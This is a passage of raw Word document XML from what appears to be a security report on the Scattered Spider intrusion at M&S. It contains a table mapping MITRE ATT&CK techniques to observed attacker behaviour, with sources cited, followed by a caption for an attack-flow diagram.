              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="44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55F3340F" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00605995" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Observed Behaviour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="186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6E21066D" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00605995" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00605995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="722D7750"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27F84A3" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1566 / T1598</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11036C9" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Phishing / Spear-phishing Voice</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36128121" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attackers impersonated employees via telephone to manipulate IT helpdesk staff into resetting credentials — a hallmark Scattered Spider tactic documented by CrowdStrike</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7EF0AD18" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CrowdStrike [4]; NCSC [3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="322FB553"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547332B" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1078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82E33F" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Valid Accounts</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54AD91" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Compromised credentials from social engineering were used to authenticate as legitimate users, bypassing perimeter controls entirely</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939108" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Microsoft MSTIC [5]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="4BC09721"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6B4C0DB0" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1621</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FB5FF4A" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MFA Request Generation</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640F9884" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Adversaries bombarded target accounts with repeated MFA push notifications ('MFA fatigue'), exploiting push-based authentication weakness</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55AE99A" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Microsoft MSTIC [5]; CISA [6]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="1F389DAA"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72B331" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1548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512F59" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Abuse Elevation Control Mechanism</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924D49" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Once inside, attackers exploited misconfigured IAM policies to escalate from standard-user to administrative roles</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ABCF33" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CrowdStrike [4]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="71EE74A2"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A0536D5" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1059</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5156C70" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter</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71EDBD1B" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PowerShell and living-off-the-land binaries used post-compromise to execute payloads within the trusted environment</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87CAC65" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NCSC [3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="3DE8742F"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FD51CD" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1087</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38157F" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Account Discovery</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9D4B74" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Systematic enumeration of user accounts, group memberships, and privilege levels to identify high-value targets for lateral movement</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648253" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Industry analysis [7]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="76E789E4"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9BDF43C" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1021</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74F6E60" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Remote Services</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D4A24C7" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Legitimate remote-access protocols (e.g., RDP, VPN) were abused using valid credentials to pivot across internal segments</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071C036" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CrowdStrike [4]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="1E678BDF"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BA1EB76" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1098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D2DC9D" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Account Manipulation</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666F92" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Account permissions were modified to maintain persistent access even if primary credentials were rotated during incident response</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D2E351" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Threat Intelligence [8]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="69D28A39"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056D9DCB" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1486</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94B1590" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Data Encrypted for Impact</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30872495" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ransomware-like behaviour disrupted retail operations — M&amp;S suffered reported losses exceeding £300m in online sales</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B9337DA" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BBC News [1]; FT [2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00316BC8" w:rsidRPr="00F870C5" w14:paraId="30B4A49D"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0D995A" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1046</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C0FA13" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Network Service Scanning</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465F5B" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Internal network scanning identified further targets for lateral movement, extending attacker dwell time</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C4DF3B" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NCSC [3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D1BEE22" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sources: MITRE ATT&amp;CK [10], CrowdStrike [4], Microsoft MSTIC [5], NCSC [3], CISA [6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538B52AF" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22EFF697" w14:textId="4E95DCFA" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.2 Attack Flow Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD3D1B9" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Figure 2 visualises the sequential attack flow, correlating MITRE technique identifiers with operational phases. The diagram highlights the critical dependency between T1566 (initial access via social engineering) and subsequent techniques — demonstrating that the entire kill chain is contingent on a single human-layer failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B21A25D" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00316BC8" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345EA2E0" w14:textId="4AD2DDEF" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00F870C5" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1698F145" wp14:editId="56AA0461">
            <wp:extent cx="5731510" cy="3215005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="113917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73260" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3215005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B4417" w14:textId="77777777" w:rsidR="00316BC8" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Figure 2 — Attack Flow Diagram: Scattered Spider Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158906A7" w14:textId="77777777" w:rsidR="00F870C5" w:rsidRDefault="00F870C5" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C62504" w14:textId="4A82B445" w:rsidR="00316BC8" w:rsidRPr="00F870C5" w:rsidRDefault="00F870C5" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
